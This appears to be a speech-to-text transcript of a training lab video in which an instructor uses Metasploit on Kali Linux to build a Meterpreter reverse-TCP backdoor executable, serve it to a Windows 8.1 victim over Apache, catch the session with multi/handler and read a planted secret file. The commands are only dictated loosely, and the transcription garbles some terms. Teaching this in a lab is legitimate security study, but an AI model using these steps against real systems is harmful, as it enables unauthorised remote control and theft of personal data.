Hello everyone. So today I'm going to start the lab 46 hacking Windows 8.1 by using Metasploit and the post exploitation using Metapreter. The main part is that we are going to hack a window. So we are using here 8.1, that's why we're talking about 8.1 here. And we are going to use the Metasploit framework. It's a tool for developing and executing exploit code against the remote target machine. So we'll use the malicious code, or you can say software, in this lab. We'll use the backdoor technology actually, and this is, we will create first, we will execute on the victim machine, then by using that particular backdoor we are going to access all the applications, right? So backdoor are the malicious file that contain the Trojan and other infectious application that can either halt the current working state of the target machine or even gain the partial complete control over that. Attacker built such a backdoor in an attempt to gain remote access to the victim machine, and they send these backdoor through email for file sharing and the network share among hard drives and so many things. The entire uses of the execution there. The main part is to use. And once the user executed that particular such applications, an attacker can gain access, attain, or it's all about to maintain access, should I say. Because in case we are talking about to gain access or to attain access, it's all about, we can talk about Trojan also, but in case we are talking about backdoor, it's all about maintaining access, because we have executed the file and we can get access anytime by using that particular file, right? So first we will use MSF. So we are using Kali Linux here as an attacker machine, and the victim machine is 8.1. so we are in intranet, and first thing we are just creating a backdoor by using Kali, and then we'll execute that particular backdoor in the victim machine, and then simply we'll maintaining the access. So first command we are using here, service start, and to show you you can make a file here that you can get access. Users, we have created a file here. So my credit card number is this. So I'll show you how you guys can get this file, how you can access this file by using Kali Linux. So this was a file I've shown you. So we're starting the services. Here we go, 9.1 database, then service for Metasploit. It's running. Then MSF console. It's taking time. Here we go. So our first work is to create the backdoor. On the desktop we are just going to create, so we are using the command msf payload. Windows, interpreter, and then reverse TCP, space lhost, the local host IP address, if config. So 1.3, you can see here internal IP address of this machine is 1.3. Should I say 192.168.1.3? 2.168.1.3 space X space desktop backdoor.exe. So we are going to create a backdoor file on desktop. Should we check that? Here we go. Then we are going to share this file on the particular victim machine. We are using here Windows 8.1. For that, obviously we need Apache server to share this. So first we are going to run the services, or we can go for the new console because we are in MSF. So here we go to servers, Apache 2, start. Starting, okay. Then our work is to copy space and root desktop backdoor.exe. This is the location of the file we have created. Space / where www dot / share. Enter. Then back to the MSF console. Here we go. We're going to use the exploit multi handler. Use exploit multi handler. Enter. So we are now handled now. So next work is to set payload. Set payload, Windows, Metapator, reverse TCP. enter, then set lhost, the IP address we have given 192.168.1.3, the IP address of the attacker machine. You can say the host, enter, then show options. You are going to check what are the options for enter. Then you can see here exit function, lhost and port we have given, right? Then simply we can use exploit. Enter. Starting the payload handler, it has been started. Now back to the victim machine, DOS 8.1, and trying to access HTTP 192.168.1.3 share. Here we go, the backdoor.exe we have created. So we are going to execute this, save the file. We're going to execute this, run. Now back to Kali Linux after executing. So you can see the MetaPredator session 1 is opened. Then session, space -i. You can see here the MetaPredator nth information is connection from 1.3 to 1.2, right? Then session space -i space 1, starting interaction with 1. Then the final thing is all about we have entered in after handler. We are on MetaPredator now. We have taken the session, right? Now whatever the service you want to check, we can go with, right? So first is system info. You can see here the computer, Metasploit, OS Windows 8, right? Then you can check IP config and it's working. It's a console, or it's a console of Kali Linux. IP config is not the right command in this, but as I've told you, we have taken the command of Windows 8.1 CMD, you can say. That's why the command is working in this. You can see all the detail of that. Or we can check some more detail. Right? We can check the list, the size, the type of directory, and working in. You can see here. This is the complete list out. Backdoor 1.2.exe, exploit.exe, inpcap, desktop ini, right? We can access the file also. Here we go, we have created the secret. So we are going to use the command cat, the file name we have given secret dot txt, enter. So you can see my credit card number is this. So this is the value, or this is a hacking of Windows 8.1 or 8 you can say, from or by using the Kali Linux in intranet connection. And whatever we can do more is all about set should I use net. We can check some more command like these. Check it again. It's not working. Okay. So this is all about the else detail, and we have accessed the file secret.txt as you have created, and you can get the data of that file by typing cat space the file and the extension. My credit card number is this. So here we have finished your lab, right? Hacking Windows by using Metasploit and the post exploitation by using Metapredator. So here we have finished your lab 46. Thank you.